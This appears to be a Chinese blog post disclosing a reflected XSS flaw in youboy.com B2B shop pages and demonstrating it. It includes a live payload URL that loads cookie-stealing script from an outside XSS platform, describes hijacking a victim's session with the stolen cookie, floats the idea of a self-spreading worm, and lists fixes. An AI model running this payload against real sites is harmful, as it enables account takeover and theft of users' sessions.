Author: Charlie

个人微博:http://YinYongYou.com

转载请注明出处。

工作过程纯粹手贱,测试了一下。然后发现了这么一个东西。有心利用能造成大范围影响。如可以自由修改用户信息。

漏洞存在文件:*.b2b.youboy.com/framephoto.html  【用户商铺的framephoto.html 文件均存在】

成因:没有对提交的参数 path 和 t 的值进行过滤就插入到网页。

漏洞证明:

看到这里,懂的同学就知道弹出那个框是什么意思了。不懂的继续往下看。看看它能干嘛。

先看下面一张图展示一个简单的攻击过程:

正常访问应该如图片中所示。提交用户名密码 -> 服务器验证成功设置SESSION、Cookie ->  Cookie存活时间内再次访问后台无需登陆

这个时候恶意用户利用网页的漏洞,构造了一个特殊的URL发送给受害者,只要受害者访问后。Cookie 就被 恶意用户窃取。

然后用Cookie 去访问网站,这个时候网站就把恶意用户当做 已经登录的用户处理。返回正常的后台数据给恶意用户。

:D 很好玩的东西。下面我用我的一台VPS 当做受害者 , 我本机当做攻击者,展示一下利用过程。

首先我们先在VPS 上登录一个账户,假装是正常的用户,已经登陆了网站。如下:

这个时候我发送一条构造好的链接给他访问【为了方便我用XSS利用平台代码实现获取Cookie过程】。

http://hgskyt.b2b.youboy.com/framephoto.html?path=http://b2b.youboy.com/img/b1.jpg&t=<script src=http://ixss.in//4T2wES?1384675589></script>

URL中参数”t“值为一段代码,作用是加载恶意JS,JS功能是获取Cookie,并传送去一个服务器上。

下面我就假装什么都不知道,在VPS上打开这个网址。如下图:

页面看起来很正常。实际VPS上的Cookie已经被上传到指定的地方了。如下图:

下面就让我们用这段Cookie在本地登录看看。看图:http://ww2.sinaimg.cn/mw690/9d3d6499gw1eao4yyc070g20hs0dchdt.gif

特地录了一段GIF。第一次我直接访问个人商铺后台,提示登录不成功。第二次,我拦截它发送的请求,然后把cookie替换成我们截取到的Cookie。

成功返回商铺的数据。

只要设置本地cookie为捕捉到的cookie,就可以登录对方商铺,为所欲为了。

假如利用JS自动进行POST数据修改 用户的商铺简介,再插入 恶意链接到页面。其它用户再点击,再感染,再传播。。。就有蠕虫的赶脚了。

修补:

1. 过滤特殊字符

2.可以考虑设置 httponly

测试环境:

本机 win8 64 + FireFox

VPS win2k3 32 + FireFox

之所以选用FireFox 是因为如Chrome 浏览器能拦截部分XSS,容易影响测试。如下:

并不是说漏洞不存在,只是它屏蔽了。

[PoC]某B2B网站的一个反射型XSS漏洞的更多相关文章

  1. [典型漏洞分享]从一个手动分析的反射型XSS漏洞看待一个安全设计原则【中危】

    这是在测试YS“本地相册”功能时发现的一个反射型XSS,自己在安全测试过程中也发现过不少XSS漏洞,唯独这个的发现过程有点区别. 在此之前,我在测试另外一个模块的功能接口的时候发现了一个反射型XSS, ...

  2. 解决反射型XSS漏洞攻击

    对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台. 一.首先从前端考虑过滤一些非法字符. 前端的主控js中,在<textarea> 输入框标签中,找到点击发送按钮后,追加到聊天 ...

  3. Wordpress Calendar Event Multi View < 1.4.01 反射型xss漏洞(CVE-2021-24498)

    简介 WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台.该平台支持在PHP和MySQL的服务器上架设个人博客网站.WordPress 插件是WordPress开源的一个应 ...

  4. markdown反射型xss漏洞复现

    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...

  5. Struts网站基于Filter的XSS漏洞修复

    下面的代码只支持struts2框架中的xss漏洞 第一步,创建过滤器XssFilter : package com.ulic.ulcif.filter; import java.io.IOExcept ...

  6. 74CMS 3.4 反射型XSS漏洞

    一. 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二.代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.4源代码编辑使用GBK编 ...

  7. 搜索框反射型xss问题解决(网站开发)

    什么是反射型XSS      XSS又叫CSS (Cross Site Script) ,跨站脚本攻击.它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的h ...

  8. 反射型XSS的逆袭之路

    0×00背景 这是一次结合各自技巧的渗透过程,由于原作者的截图不多,我们只是简单叙述一下思路~ 目标是一家本地的游戏公司,起因是找到一个反射型xss,但是却被对方公司忽略,而作者身边的一个妹子也在这家 ...

  9. 快速找出网站中可能存在的XSS漏洞实践

    笔者写了一些XSS漏洞的挖掘过程记录下来,方便自己也方便他人. 一.背景 在本篇文章当中会一permeate生态测试系统为例,笔者此前写过一篇文章当中笔者已经讲解如何安装permeate渗透测试系统, ...

随机推荐

  1. ajax上传图片 jquery插件 jquery.form.js 的方法 ajaxSubmit; AjaxForm与AjaxSubmit的差异

    先引入脚本  这里最好是把jquery的脚本升级到1.7 <script src="js/jquery-1.7.js" type="text/javascript& ...

  2. linux面试题3

    1. 下面的网络协议中,面向连接的的协议是: A . A 传输控制协议 B 用户数据报协议 C 网际协议 D 网际控制报文协议 2. 在/etc/fstab文件中指定的文件系统加载参数中, D 参数一 ...

  3. <三>面向对象分析之UML核心元素之参与者

    一:版型        --->在UML里有一个概念叫版型.有些书里也称类型,构造型.        --->这个概念是对一个UML元素基础定义的扩展.在同一个元素基础定义的基础上赋予特别 ...

  4. HTTP请求中浏览器的缓存机制

    摘要:在Web开发过程中,我们可能会经常遇到浏览器缓存的问题.本文作者详细解释了浏览器缓存的机制,帮助读者更深层次的认识浏览器的缓存. 流程 当资源第一次被访问的时候,HTTP头部如下 (Reques ...

  5. C++ 函数重载与函数匹配

    <C++ Primer>笔记,整理关于函数重载与函数匹配的笔记. 函数重载 void func(int a); //原函数 void func(double a); //正确:形参类型不同 ...

  6. CF 577B Modulo Sum

    题意:给一个长度为n的正整数序列,问能不能找到一个不连续的子序列的和可以被m整除. 解法:抽屉原理+dp.首先当m<n时一定是有答案的,因为根据抽屉原理,当得到这个序列的n个前缀和%m时,一定会 ...

  7. Brackets sequence

    题意: 给你一个括号序列(有中小括号),求出以给定序列为子序列的最小合法括号序列. 分析: 非常经典,以前做过相似一道题,用区间dp,但怎么把这个序列求出来没想出来. dp[i][j]表示区间i-j是 ...

  8. HDU 3695-Computer Virus on Planet Pandora(ac自动机)

    题意: 给一个母串和多个模式串,求模式串在母串后翻转后的母串出现次数的的总和. 分析: 模板题 /*#include <cstdio> #include <cstring> # ...

  9. IOS CAShapeLayer CAGradientLayer UIBezierPath 使用实例

    CGRect rect = CGRectMake(100, 100, 100, 100); UIView * bgView = [[UIView alloc]initWithFrame:rect]; ...

  10. 《Python CookBook2》 第四章 Python技巧 对象拷贝 && 通过列表推导构建列表

    (先学第四章) 对象拷贝 任务: Python通常只是使用指向原对象的引用,并不是真正的拷贝. 解决方案: >>> a = [1,2,3] >>> import c ...